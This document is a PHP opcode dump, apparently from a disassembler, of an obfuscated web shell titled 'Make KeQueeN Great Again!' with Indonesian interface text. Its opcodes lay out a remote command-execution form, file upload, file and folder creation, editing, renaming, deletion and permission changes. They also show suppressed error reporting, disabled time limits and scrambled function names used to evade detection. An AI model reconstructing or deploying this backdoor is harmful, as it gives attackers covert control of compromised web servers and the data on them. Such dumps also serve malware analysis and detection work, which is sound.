||594|>|JMP||||->633|
||595|>|INIT_FCALL||||'error_reporting'|
||596||SEND_VAL||||0|
||597||DO_ICALL||||
||598|>|JMP||||->1380|
||599|>>|JMP||||->1116|
||600|*|JMP||||->635|
||601|>|INIT_FCALL||||'getcwd'|
||602||DO_ICALL|||$239|
||603||ASSIGN||||!5|,|$239|
||604|>|JMP||||->98|
||605|>|ECHO||||'%3C%2Fdiv%3E%0A'|
||606|>|JMP||||->90|
||607|>|ECHO||||'%3C%2Ftextarea%3E%0A%3C%2Fdiv%3E%0A'|
||608|>|JMP||||->651|
||609|>|INIT_FCALL||||'getcwd'|
||610||DO_ICALL|||$241|
||611||ASSIGN||||!5|,|$241|
||612|>|JMP||||->1139|
||613|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22+style%3D%22text-align%3A+center%3B%22%3ENama+File+Baru+%3A%3C%2Fh5%3E%0A%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Cinput+type%3D%22text%22+name%3D%22new_file_name%22+id%3D%22new_file_name%22+class%3D%22border+p-1%22+style%3D%22text-align%3A+center%3B%22%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Ctextarea+style%3D%22resize%3Anone%22+name%3D%22file_content%22+id%3D%22file_content%22+cols%3D%2230%22+rows%3D%2210%22+class%3D%22form-control+rainbow-border%22%3E%3C%2Ftextarea%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22+style%3D%22margin-top%3A+10px%3B%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22create_file%22+class%3D%22ohct%22%3ECreate%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fform%3E%0A'|
||614|>|JMP||||->1400|
||615|>|FETCH_IS|||~243|'_POST'|
||616||ISSET_ISEMPTY_DIM_OBJ||0|~244|~243|,|'run_command'|
||617||BOOL_NOT|||~245|~244|
||618|>|JMPZ||||~245|,|->620|
||619|>>|JMP||||->22|
||620|>>|JMP||||->130|
||621|>>|JMP||||->47|
||622|>>|JMP||||->1412|
||623|*|JMP||||->1425|
||624|>>|JMP||||->156|
||625|>>|JMP||||->1081|
||626|>>|JMP||||->1332|
||627|*|JMP||||->1319|
||628|>|INIT_FCALL_BY_NAME||||'Fo73G'|
||629||SEND_VAL_EX||||'failed+to+delete+the+folder'|
||630||SEND_VAL_EX||||0|
||631||DO_FCALL||0||
||632|>|JMP||||->640|
||633|>|ASSIGN||||!25|,|'Shell+kamu+heheh'|
||634|>|JMP||||->1327|
||635|>>|JMP||||->792|
||636|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22+style%3D%22text-align%3A+center%3B%22%3EEdit+Nama+File%3A+%3Cfont+color%3D%22white%22%3E'|
||637|>|JMP||||->840|
||638|>|ECHO||||'%3C%2Fspan%3E%3C%2Fli%3E%0A%3Cli%3E%3Ca+href%3D%22%3Fp%3D'|
||639|>|JMP||||->1261|
||640|>>|JMP||||->171|
||641|*|JMP||||->71|
||642|>>|JMP||||->799|
||643|>>|JMP||||->53|
||644|>|INIT_FCALL||||'basename'|
||645||FETCH_R|global||~248|'_POST'|
||646||FETCH_DIM_R|||~249|~248|,|'folder_name'|
||647||SEND_VAL||||~249|
||648||DO_ICALL|||$250|
||649||ASSIGN||||!15|,|$250|
||650|>|JMP||||->120|
||651|>>|JMP||||->605|
||652|>>|JMP||||->1158|
||653|>>|JMP||||->77|
||654|*|JMP||||->705|
||655|>|FETCH_IS|||~252|'_GET'|
||656||ISSET_ISEMPTY_DIM_OBJ||0|~253|~252|,|'n'|
||657||BOOL_NOT|||~254|~253|
||658|>|JMPZ||||~254|,|->660|
||659|>>|JMP||||->68|
||660|>>|JMP||||->695|
||661|>>|JMP||||->665|
||662|>>|JMP||||->651|
||663|*|JMP||||->1223|
||664|>>|JMP||||->1413|
||665|>|COUNT|||~255|!2|
||666||IS_SMALLER||||!10|,|~255|
||667|>|JMPZ||||~256|,|->669|
||668|>>|JMP||||->624|
||669|>>|JMP||||->1336|
||670|>|FETCH_DIM_R|||~257|!2|,|4|
||671||INIT_DYNAMIC_CALL||||~257|
||672||SEND_VAL_EX||||'%2F%28%5C%5C%7C%5C%2F%29%2F'|
||673||SEND_VAR_EX||||!17|
||674||DO_FCALL||0|$258|
||675||ASSIGN||||!21|,|$258|
||676|>|JMP||||->467|
||677|>|INIT_FCALL||||'htmlspecialchars'|
||678||INIT_FCALL||||'scsoc'|
||679||FETCH_R|global||~260|'_GET'|
||680||FETCH_DIM_R|||~261|~260|,|'n'|
||681||SEND_VAL||||~261|
||682||DO_FCALL||0|$262|
||683||SEND_VAR||||$262|
||684||DO_ICALL|||$263|
||685||ECHO||||$263|
||686|>|JMP||||->55|
||687|>>|JMP||||->1197|
||688|>|ECHO||||'%3C%2Fspan%3E%3C%2Fli%3E%0A%3Cli%3EServer+Software+%3A+%3Cspan+style%3D%22color%3A+white%3B%22%3E'|
||689|>|JMP||||->1219|
||690|>|IS_EQUAL|||~264|!0|,|'newFile'|
||691||BOOL_NOT|||~265|~264|
||692|>|JMPZ||||~265|,|->694|
||693|>>|JMP||||->705|
||694|>>|JMP||||->653|
||695|>|INIT_FCALL||||'scsoc'|
||696||FETCH_R|global||~266|'_GET'|
||697||FETCH_DIM_R|||~267|~266|,|'n'|
||698||SEND_VAL||||~267|
||699||DO_FCALL||0|$268|
||700||ASSIGN||||!1|,|$268|
||701|>|JMP||||->1191|
||702|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22%3EUbah+Izin+%3A+'|
||703|>|JMP||||->1206|
||704|>>|JMP||||->1120|
||705|>>|JMP||||->784|
||706|>|FETCH_R|global||~270|'_FILES'|
||707||FETCH_DIM_R|||~271|~270|,|'f'|
||708||FETCH_DIM_R|||~272|~271|,|'name'|
||709|>|FE_RESET_R|||$273|~272|,|->767|
||710|>>|FE_FETCH_R|||~274|$273|,|!1|,->767|
||711|>|ASSIGN||||!26|,|~274|
||712||NOP||||
||713|>|JMP||||->752|
||714|>|NOP||||
||715|>|JMP||||->764|
||716|>|NOP||||
||717|>|JMP||||->766|
||718|>|IS_NOT_EQUAL|||~276|!27|,|''|
||719||BOOL_NOT|||~277|~276|
||720|>|JMPZ||||~277|,|->723|
||721|>|NOP||||
||722|>|JMP||||->764|
||723|>|NOP||||
||724|>|JMP||||->745|
||725|>|NOP||||
||726|>|JMP||||->714|
||727|*|NOP||||
||728|*|JMP||||->729|
||729|>|NOP||||
||730|>|JMP||||->759|
||731|>|INIT_FCALL||||'move_uploaded_file'|
||732||SEND_VAR||||!27|
||733||SEND_VAR||||!28|
||734||DO_ICALL|||$278|
||735|>|JMPZ||||$278|,|->738|
||736|>|NOP||||
||737|>|JMP||||->729|
||738|>|NOP||||
||739|>|JMP||||->740|
||740|>|INIT_FCALL_BY_NAME||||'FO73G'|
||741||SEND_VAL_EX||||'Gagal+mengunggah+file.'|
||742||DO_FCALL||0||
||743||NOP||||
||744|>|JMP||||->725|
||745|>|INIT_FCALL||||'getcwd'|
||746||DO_ICALL|||$280|
||747||CONCAT|||~281|$280|,|'%2F'|
||748||CONCAT|||~282|~281|,|!1|
||749||ASSIGN||||!28|,|~282|
||750||NOP||||
||751|>|JMP||||->731|
||752|>|FETCH_R|global||~284|'_FILES'|
||753||FETCH_DIM_R|||~285|~284|,|'f'|
||754||FETCH_DIM_R|||~286|~285|,|'tmp_name'|
||755||FETCH_DIM_R|||~287|~286|,|!26|
||756||ASSIGN||||!27|,|~287|
||757||NOP||||
||758|>|JMP||||->718|
||759|>|INIT_FCALL_BY_NAME||||'FO73g'|
||760||SEND_VAL_EX||||'File+berhasil+diunggah.'|
||761||DO_FCALL||0||
||762||NOP||||
||763|>|JMP||||->714|
||764|>|NOP||||
||765|>|JMP||||->716|
||766|>>|JMP||||->710|
||767|>|FE_FREE||||$273|
||768|>|JMP||||->82|
||769|>|ECHO||||'%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Cinput+type%3D%22text%22+name%3D%22command%22+id%3D%22command%22+class%3D%22border+p-1%22+style%3D%22text-align%3A+center%3B%22+placeholder%3D%22Masukkan+Command%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22run_command%22+class%3D%22ohct%22%3EEksekusi%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E%0A%3C%2Fform%3E%0A%0A'|
||770|>|JMP||||->615|
||771|>|INIT_FCALL_BY_NAME||||'fO73G'|
||772||SEND_VAL_EX||||'File+gagal+dibuat'|
||773||SEND_VAL_EX||||0|
||774||DO_FCALL||0||
||775|>|JMP||||->622|
||776|>>|JMP||||->664|
||777|>>|JMP||||->1119|
||778|>|INIT_FCALL||||'set_time_limit'|
||779||SEND_VAL||||0|
||780||DO_ICALL||||
||781|>|JMP||||->126|
||782|>>|JMP||||->651|
||783|*|JMP||||->77|
||784|>|IS_EQUAL|||~292|!0|,|'rename'|
||785||BOOL_NOT|||~293|~292|
||786|>|JMPZ||||~293|,|->788|
||787|>>|JMP||||->1190|
||788|>>|JMP||||->198|
||789|>>|JMP||||->1150|
||790|>>|JMP||||->642|
||791|>>|JMP||||->189|
||792|>|INIT_FCALL||||'scsoc'|
||793||FETCH_R|global||~294|'_GET'|
||794||FETCH_DIM_R|||~295|~294|,|'a'|
||795||SEND_VAL||||~295|
||796||DO_FCALL||0|$296|
||797||ASSIGN||||!0|,|$296|
||798|>|JMP||||->1116|
||799|>|ECHO||||'+%0A%3C%2Fspan%3E%3C%2Fli%3E%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22table-responsive+text-light%22+style%3D%22text-align%3A+center%3Bfont-family%3A+inherit%3Bfont-size%3A+large%3B%22%3E%0A'|
||800|>|JMP||||->93|
||801|>|ECHO||||'%3C%2Ftextarea%3E%0A%3C%2Fdiv%3E%0A%0A'|
||802|>|JMP||||->22|
||803|>>|JMP||||->776|
||804|*|JMP||||->1149|
||805|>>|JMP||||->651|
||806|*|JMP||||->415|
||807|>|FETCH_IS|||~298|'_POST'|
||808||ISSET_ISEMPTY_DIM_OBJ||0|~299|~298|,|'submit'|
||809||BOOL_NOT|||~300|~299|
||810|>|JMPZ||||~300|,|->812|
||811|>>|JMP||||->1138|
||812|>>|JMP||||->358|
||813|>|INIT_FCALL||||'file_exists'|
||814||SEND_VAR||||!12|
||815||DO_ICALL|||$301|
||816||BOOL_NOT|||~302|$301|
||817|>|JMPZ||||~302|,|->819|
||818|>>|JMP||||->71|
||819|>>|JMP||||->628|
||820|>|FETCH_R|global||~303|'_SERVER'|
||821||FETCH_DIM_R|||~304|~303|,|'HTTP_HOST'|
||822||ASSIGN||||!29|,|~304|
||823|>|JMP||||->1333|
||824|>>|JMP||||->1256|
||825|*|JMP||||->201|
||826|>|IS_EQUAL|||~306|!0|,|'newDir'|
||827||BOOL_NOT|||~307|~306|
||828|>|JMPZ||||~307|,|->830|
||829|>>|JMP||||->44|
||830|>>|JMP||||->69|
||831|>>|JMP||||->438|
||832|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22+style%3D%22text-align%3A+center%3B%22%3ENama+Folder+Baru+%3A%3C%2Fh5%3E%0A%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Cinput+name%3D%22folder_name%22+id%3D%22folder_name%22+class%3D%22border+p-1%22+autocomplete%3D%22off%22+style%3D%22text-align%3A+center%3B%22%3E%0A++++%3C%2Fdiv%3E%0A++++%3Cdiv+class%3D%22form-group%22+style%3D%22margin-top%3A+10px%3B%22%3E%0A++++++++%3Cbutton+type%3D%22submit%22+name%3D%22create_folder%22+class%3D%22ohct%22%3ECreate%3C%2Fbutton%3E%0A++++%3C%2Fdiv%3E+%0A%3C%2Fform%3E+%0A%0A'|
||833|>|JMP||||->1275|
||834|>|INIT_FCALL||||'fo73g'|
||835||SEND_VAL||||'failed+to+delete+the+file'|
||836||SEND_VAL||||0|
||837||DO_FCALL||0||
||838|>|JMP||||->803|
||839|>>|JMP||||->109|
||840|>|INIT_FCALL||||'htmlspecialchars'|
||841||INIT_FCALL||||'scsoc'|
||842||FETCH_R|global||~309|'_GET'|
||843||FETCH_DIM_R|||~310|~309|,|'n'|
||844||SEND_VAL||||~310|
||845||DO_FCALL||0|$311|
||846||SEND_VAR||||$311|
||847||DO_ICALL|||$312|
||848||ECHO||||$312|
||849|>|JMP||||->1363|
||850|>|FETCH_DIM_R|||~313|!2|,|18|
||851||INIT_DYNAMIC_CALL||||~313|
||852||FETCH_DIM_R|||~314|!2|,|14|
||853||INIT_DYNAMIC_CALL||||~314|
||854||INIT_FCALL||||'getcwd'|
||855||DO_ICALL|||$315|
||856||CONCAT|||~316|$315|,|'%2F'|
||857||INIT_FCALL||||'scsoc'|
||858||FETCH_R|global||~317|'_GET'|
||859||FETCH_DIM_R|||~318|~317|,|'n'|
||860||SEND_VAL||||~318|
||861||DO_FCALL||0|$319|
||862||CONCAT|||~320|~316|,|$319|
||863||SEND_VAL_EX||||~320|
||864||DO_FCALL||0|$321|
||865||SEND_VAR_NO_REF_EX||||$321|
||866||DO_FCALL||0|$322|
||867||ECHO||||$322|
||868|>|JMP||||->607|
||869|>|ECHO||||'+%0A%3C%21DOCTYPE+html%3E%0A%3Chtml+lang%3D%22en%22%3E%0A%3Chead%3E%0A++++%3Cmeta+property%3D%22og%3Aimage%22+content%3D%22%2F%2Fres.cloudinary.com%2Fddkldtlwq%2Fimage%2Fupload%2Fv1725647241%2Ffavicon_bb983db6-7439-44b1-8c54-3a49f6fbcee1_1723809570427_piombf.png%22%3E%0A++++%3Cmeta+property%3D%22og%3Atitle%22+content%3D%22Make+KeQueeN+Great+Again%21%22%3E%0A++++%3Cmeta+property%3D%22og%3Adescription%22+content%3D%22By+KeQueeN%22%3E%0A++++%3Cmeta+name%3D%22theme-color%22+content%3D%22%23a200ff%22%3E%0A++++%3Cmeta+name%3D%22viewport%22+content%3D%22width%3Ddevice-width%2C+initial-scale%3D0.60%2C+shrink-to-fit%3Dno%22%3E%0A++++%3Ctitle%3EMake+KeQueeN+Great+Again%21%3C%2Ftitle%3E%0A++++%3Clink+rel%3D%22stylesheet%22+href%3D%22%2F%2Fcdn.jsdelivr.net%2Fnpm%2Fbootstrap%404.6.0%2Fdist%2Fcss%2Fbootstrap.min.css%22%3E%0A++++%3Clink+rel%3D%22stylesheet%22+href%3D%22%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Ffont-awesome%2F4.7.0%2Fcss%2Ffont-awesome.min.css%22%3E%0A++++%3Clink+rel%3D%22icon%22+href%3D%22%2F%2Fres.cloudinary.com%2Fddkldtlwq%2Fimage%2Fupload%2Fv1725647241%2Ffavicon_bb983db6-7439-44b1-8c54-3a49f6fbcee1_1723809570427_piombf.png%22%3E%0A++++%3Cstyle+type%3D%22text%2Fcss%22%3E%0A%40import+url%28%27https%3A%2F%2Ffonts.googleapis.com%2Fcss2%3Ffamily%3DAmaranth%3Aital%2Cwght%400%2C400%3B0%2C700%3B1%2C400%3B1%2C700%26display%3Dswap%27%29%3B%0A%40import+url%28%27https%3A%2F%2Ffonts.googleapis.com%2Fcss2%3Ffamily%3DRock%2BSalt%26display%3Dswap%27%29%3B%0Abody+%7B%0A++++color%3A+black%3B%0A++++font-size%3A+0px%3B%0A++++font-family%3A+%27Amaranth%27%3B%0A++++width%3A+99%25%3B%0A++++padding%3A+0px%3B%0A++++margin-right%3A+auto%3B%0A++++margin-left%3A+auto%3B%0A++++margin-top%3A+7px%3B%0A++++margin-bottom%3A+7px%3B%0A++++background-color%3A+black%21important%3B%0A%7D%0A%0A.bg-dark+%7B%0A++++background-color%3A+black%21important%3B%0A%7D%0A%0A.border+%7B%0A++++box-shadow%3A+0px+0px+10px+%23a200ff%3B%0A++++border%3A+2px+solid+%23a200ff%21important%3B%0A++++border-radius%3A+5px%3B%0A++++background%3A+transparent%3B%0A%7D%0A%0A.border%3Ahover+%7B%0A++++box-shadow%3A+0px+0px+10px+%23a200ff%3B%0A++++border%3A+2px+solid+%23a200ff%21important%3B%0A%7D%0A%0A.table+td+%7B%0A++++padding%3A+0.1rem%3B%0A++++box-shadow%3A+inset+0px+0px+0px+1px+%23a200ff%3B%0A++++border-radius%3A+2px%3B%0A%7D%0A%0A.table+thead+th+%7B%0A++++font-family%3A+%27Amaranth%27%2C+cursive%3B%0A++++box-shadow%3A+inset+0px+0px+0px+1.5px+%23a200ff%3B%0A++++color%3A+%23a200ff%3B%0A++++padding%3A+0.25rem%3B%0A++++border-radius%3A+5px%3B%0A++++background%3A+linear-gradient%28to+bottom%2C+black%2C+%233f3f3f80%29%3B%0A%7D%0A%0A.table-hover+tbody+tr%3Ahover+td+%7B%0A++++background%3A+%233f3f3f80%3B%0A++++box-shadow%3A+inset+0px+0px+0px+1px+%23a200ff%3B%0A++++border-radius%3A+2px%3B%0A%7D%0A%0A.table-hover+tbody+tr%3Ahover+td%3E%2A+%7B%0A%7D%0A%0A.table%3Etbody%3Etr%3E%2A+%7B%0A++++color%3A%23fff%3B%0A++++vertical-align%3Amiddle%3B%0A%7D%0A%0A.form-control+%7B%0A++++background%3A0+0%21important%3B%0A++++color%3A%23fff%21important%3B%0A++++border-radius%3A0%3B%0A%7D%0A%0A.form-control%3A%3Aplaceholder+%7B%0A++++color%3A%23fff%3B%0A++++opacity%3A1%3B%0A%7D%0A%0A.form-group+%7B%0A++++margin-top%3A+.3rem%3B%0A++++margin-bottom%3A+.3rem%3B%0A%7D%0A%0Ali+%7B%0A++++font-size%3Alarge%21important%3B%0A++++color%3A+%23a200ff%21important%3B%0A++++list-style%3A+inherit%21important%3B%0A%7D%0A%0Aa+%7B%0A++++color%3A+%23ffffff%3B%0A++++text-decoration%3A+none%21important%3B%0A%7D%0A%0Aa%3Ahover+%7B%0A++++text-decoration%3A+none%21important%3B%0A++++color%3A+%23a200ff%3B%0A++++animation%3A+kedip+1s+linear+infinite%3B%0A%7D%0A%0Ah5+%7B%0A++++margin-top%3A+1.5px%3B%0A++++margin-bottom%3A+1.5px%3B%0A++++color%3A+%23a200ff%21important%3B%0A++++padding%3A+2px%3B%0A%7D%0A%0Atextarea+%7B%0A++++width%3A+97%25%3B%0A++++font-size%3A+medium%21important%3B%0A++++font-family%3A+inherit%3B%0A++++height%3A+44vh%3B%0A++++padding-left%3A+5px%3B%0A%7D%0A%0Abutton%2C+input+%7B%0A++++border%3A+2px+solid+%23a200ff%3B%0A++++border-radius%3A+5px%3B%0A++++font-size%3A+15px%3B%0A++++color%3Awhite%3B%0A++++line-height%3A+normal%3B%0A++++font-family%3A+inherit%3B%0A%7D%0A%0Abutton%2C+input%3Ahover+%7B%0A++++border%3A+2px+solid+%23a200ff%3B%0A++++cursor%3A+pointer%3B%0A%7D%0A%0A.ohct+%7B%0A++++padding-left%3A+1rem%3B%0A++++padding-right%3A+1rem%3B%0A++++color%3A+white%3B%0A++++border%3A+2px+solid+%23a200ff%3B%0A++++border-radius%3A+5px%3B%0A++++background-color%3A+transparent%3B%0A++++font-family%3A+inherit%3B%0A++++font-size%3A+16px%3B%0A%7D%0A%0A.ohct%3Ahover+%7B%0A++++border%3A+2px+solid+%23a200ff%3B%0A++++color%3A+%23a200ff%21important%3B%0A%7D%0A%0A.combet+%7B%0A++++color%3A+white%3B%0A%7D%0A%0A.combet%3Ahover+%7B%0A++++color%3A+%23a200ff%3B%0A%7D%0A%0A.p-1+%7B%0A++++padding%3A+4px%3B%0A%7D%0A%0A%3A%3Aselection+%7B%0A++++color%3A+black%3B%0A++++background%3A+silver%3B%0A%7D%0A%0A.fa+%7B%0A++++padding%3A+10px%3B%0A++++font-size%3A+20px%3B%0A++++width%3A+50px%3B%0A++++text-align%3A+center%3B%0A++++text-decoration%3A+none%3B%0A++++margin%3A+5px%3B%0A++++color%3A+%23a200ff%3B%0A%7D%0A%0A.fa%3Ahover+%7B%0A++++border%3A+2px+solid+%23a200ff%3B%0A%7D%0A%0A.text-light+%7B%0A++++color%3A+%23f8f9fa%21important%3B%0A++++font-size%3A+large%21important%3B%0A%7D%0A%0A.kedip+%7B%0A++++animation%3A+kedip+1s+linear+infinite%3B%0A%7D%0A%0A%40keyframes+kedip+%7B%0A++++0%25+%7B%0A++++++++color%3A+%23a200ff%3B%0A++++%7D%0A++++50%25+%7B%0A++++++++color%3A+white%3B%0A++++%7D%0A++++100%25+%7B%0A++++++++color%3A+%23a200ff%3B%0A++++%7D%0A%7D%0A%0A%40keyframes+rainbowBorder+%7B%0A++++++++++++0%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+%23a200ff%2C+magenta%29+1%3B%0A++++++++++++%7D%0A++++++++++++14%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+magenta%2C+aqua%29+1%3B%0A++++++++++++%7D%0A++++++++++++28%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+aqua%2C+mauve%29+1%3B%0A++++++++++++%7D%0A++++++++++++42%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+mauve%2C+cyan%29+1%3B%0A++++++++++++%7D%0A++++++++++++57%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+cyan%2C+blue%29+1%3B%0A++++++++++++%7D%0A++++++++++++71%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+blue%2C+pink%29+1%3B%0A++++++++++++%7D%0A++++++++++++85%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+pink%2C+%23a200ff%29+1%3B%0A++++++++++++%7D%0A++++++++++++100%25+%7B%0A++++++++++++++++border-image%3A+linear-gradient%28to+right%2C+%23a200ff%2C+magenta%29+1%3B%0A++++++++++++%7D%0A++++++++%7D%0A%0A.rainbow-border+%7B%0A++++border%3A+2px+solid+blue%3B%0A++++border-radius%3A+5px%21important%3B%0A++++animation%3A+rainbowBorder+2s+linear+infinite%3B%0A%7D%0A++++++++%40keyframes+rainbowText+%7B%0A++++++++++++0%25+%7B%0A++++++++++++++++color%3A+%23a200ff%3B%0A++++++++++++%7D%0A++++++++++++14%25+%7B%0A++++++++++++++++color%3A+magenta%3B%0A++++++++++++%7D%0A++++++++++++28%25+%7B%0A++++++++++++++++color%3A+aqua%3B%0A++++++++++++%7D%0A++++++++++++42%25+%7B%0A++++++++++++++++color%3A+mauve%3B%0A++++++++++++%7D%0A++++++++++++57%25+%7B%0A++++++++++++++++color%3A+cyan%3B%0A++++++++++++%7D%0A++++++++++++71%25+%7B%0A++++++++++++++++color%3A+blue%3B%0A++++++++++++%7D%0A++++++++++++85%25+%7B%0A++++++++++++++++color%3A+pink%3B%0A++++++++++++%7D%0A++++++++++++100%25+%7B%0A++++++++++++++++color%3A+%23a200ff%3B%0A++++++++++++%7D%0A++++++++%7D%0A.rainbow-text+%7B%0A++++++++++++animation%3A+rainbowText+2s+infinite%3B%0A++++++++++++font-weight%3A+bold%3B%0A++++++++%7D%0A%3C%2Fstyle%3E%0A++++%3Cscript+src%3D%22%2F%2Funpkg.com%2Fsweetalert%2Fdist%2Fsweetalert.min.js%22%3E%3C%2Fscript%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%3Cdiv+class%3D%22table-responsive+text-light+rainbow-border%22+style%3D%22text-align%3A+left%3Bpadding%3A+4px%3B%22%3E%0A%3Cdiv+style%3D%22text-align%3A+center%3Bdisplay%3A+flex%3Balign-items%3A+center%3Bjustify-content%3A+center%3Balign-content%3A+center%3B%22%3E%0A%3Ca+href%3D%22%3F%22+style%3D%22font-size%3A+1.5rem%3Bpadding%3A+0.5rem%3B%22%3E%3Cspan+class%3D%22rainbow-text%22+style%3D%22font-family%3ACurlz+MT%22%3EMake+KeQueeN+Great+Again%21%3C%2Fspan%3E%3C%2Fa%3E+%0A%3C%2Fdiv%3E%0A%3Cli%3EYour+IP+%3A+%3Cspan+style%3D%22color%3A+white%3B%22%3E'|
||870|>|JMP||||->1230|
||871|>>|FE_RESET_R|||$323|!18|,|->1068|
||872|>>|FE_FETCH_R||||$323|,|!4|,->1068|
||873|>|NOP||||
||874|>|JMP||||->1026|
||875|>|NOP||||
||876|>|JMP||||->1059|
||877|>|INIT_FCALL_BY_NAME||||'Ce_Vx'|
||878||SEND_VAR_EX||||!17|
||879||DO_FCALL||0|$324|
||880||CONCAT|||~325|'%0A%3Ctr%3E%0A%3Ctd+style%3D%22text-align%3A+left%3B%22%3E%0A%3Ci+class%3D%22fa+fa-fw+fa-file-o%22+style%3D%22border%3A+0%3Bpadding%3A+0%3Bwidth%3A+1.28571429em%3B%22%3E%3C%2Fi%3E%3Ca+href%3D%22%3Fp%3D'|,|$324|
||881||CONCAT|||~326|~325|,|'%26a%3D'|
||882||INIT_FCALL_BY_NAME||||'CE_vX'|
||883||SEND_VAL_EX||||'view'|
||884||DO_FCALL||0|$327|
||885||CONCAT|||~328|~326|,|$327|
||886||CONCAT|||~329|~328|,|'%26n%3D'|
||887||INIT_FCALL_BY_NAME||||'ce_vx'|
||888||SEND_VAR_EX||||!4|
||889||DO_FCALL||0|$330|
||890||CONCAT|||~331|~329|,|$330|
||891||CONCAT|||~332|~331|,|'%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Latest+modify+on+'|
||892||FETCH_DIM_R|||~333|!2|,|19|
||893||INIT_DYNAMIC_CALL||||~333|
||894||SEND_VAL_EX||||'Y-m-d+H%3Ai'|
||895||FETCH_DIM_R|||~334|!2|,|20|
||896||INIT_DYNAMIC_CALL||||~334|
||897||ROPE_INIT||3|~336|!17|
||898||ROPE_ADD||1|~336|~336|,|'%2F'|
||899||ROPE_END||2|~335|~336|,|!4|
||900||SEND_VAL_EX||||~335|
||901||DO_FCALL||0|$338|
||902||SEND_VAR_NO_REF_EX||||$338|
||903||DO_FCALL||0|$339|
||904||CONCAT|||~340|~332|,|$339|
||905||ROPE_INIT||5|~342|'%22%3E'|
||906||ROPE_ADD||1|~342|~342|,|!4|
||907||ROPE_ADD||2|~342|~342|,|'%3C%2Fa%3E%3C%2Ftd%3E%0A%3Ctd%3E%3Cspan%3E'|
||908||ROPE_ADD||3|~342|~342|,|!30|
||909||ROPE_END||4|~341|~342|,|'%3C%2Fspan%3E%3C%2Ftd%3E%0A%3Ctd%3E%0A++++++++++++++++++++%3Ca+href%3D%22%3Fp%3D'|
||910||CONCAT|||~345|~340|,|~341|
||911||INIT_FCALL_BY_NAME||||'CE_vX'|
||912||SEND_VAR_EX||||!17|
||913||DO_FCALL||0|$346|
||914||CONCAT|||~347|~345|,|$346|
||915||CONCAT|||~348|~347|,|'%26a%3D'|
||916||INIT_FCALL_BY_NAME||||'ce_vx'|
||917||SEND_VAL_EX||||'changePerms'|
||918||DO_FCALL||0|$349|
||919||CONCAT|||~350|~348|,|$349|
||920||CONCAT|||~351|~350|,|'%26n%3D'|
||921||INIT_FCALL_BY_NAME||||'CE_VX'|
||922||SEND_VAR_EX||||!4|
||923||DO_FCALL||0|$352|
||924||CONCAT|||~353|~351|,|$352|
||925||CONCAT|||~354|~353|,|'%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Change+Permissions%22+data-original-title%3D%22Change+Permissions%22%3E%3Cfont+color%3D%22'|
||926||FETCH_DIM_R|||~355|!2|,|8|
||927||INIT_DYNAMIC_CALL||||~355|
||928||ROPE_INIT||3|~357|!17|
||929||ROPE_ADD||1|~357|~357|,|'%2F'|
||930||ROPE_END||2|~356|~357|,|!4|
||931||SEND_VAL_EX||||~356|
||932||DO_FCALL||0|$359|
||933|>|JMPZ||||$359|,|->936|
||934|>|QM_ASSIGN|||~360|'%2300ff00'|
||935|>|JMP||||->949|
||936|>|FETCH_DIM_R|||~361|!2|,|9|
||937||INIT_DYNAMIC_CALL||||~361|
||938||ROPE_INIT||3|~363|!17|
||939||ROPE_ADD||1|~363|~363|,|'%2F'|
||940||ROPE_END||2|~362|~363|,|!4|
||941||SEND_VAL_EX||||~362|
||942||DO_FCALL||0|$365|
||943||BOOL_NOT|||~366|$365|
||944|>|JMPZ||||~366|,|->947|
||945|>|QM_ASSIGN|||~367|'%23a200ff'|
||946|>|JMP||||->948|
||947|>|QM_ASSIGN|||~367|null|
||948|>|QM_ASSIGN|||~360|~367|
||949|>|CONCAT|||~368|~354|,|~360|
||950||CONCAT|||~369|~368|,|'%22%3E'|
||951||INIT_FCALL_BY_NAME||||'KnSTU'|
||952||ROPE_INIT||3|~371|!17|
||953||ROPE_ADD||1|~371|~371|,|'%2F'|
||954||ROPE_END||2|~370|~371|,|!4|
||955||SEND_VAL_EX||||~370|
||956||DO_FCALL||0|$373|
||957||CONCAT|||~374|~369|,|$373|
||958||CONCAT|||~375|~374|,|'%3C%2Ffont%3E%3C%2Fa%3E%0A++++++++++++++++%3C%2Ftd%3E%0A%3Ctd%3E%3Ca+href%3D%22%3Fp%3D'|
||959||INIT_FCALL_BY_NAME||||'cE_VX'|
||960||SEND_VAR_EX||||!17|
||961||DO_FCALL||0|$376|
||962||CONCAT|||~377|~375|,|$376|
||963||CONCAT|||~378|~377|,|'%26a%3D'|
||964||INIT_FCALL_BY_NAME||||'Ce_Vx'|
||965||SEND_VAL_EX||||'edit'|
||966||DO_FCALL||0|$379|
||967||CONCAT|||~380|~378|,|$379|
||968||CONCAT|||~381|~380|,|'%26n%3D'|
||969||INIT_FCALL_BY_NAME||||'Ce_vX'|
||970||SEND_VAR_EX||||!4|
||971||DO_FCALL||0|$382|
||972||CONCAT|||~383|~381|,|$382|
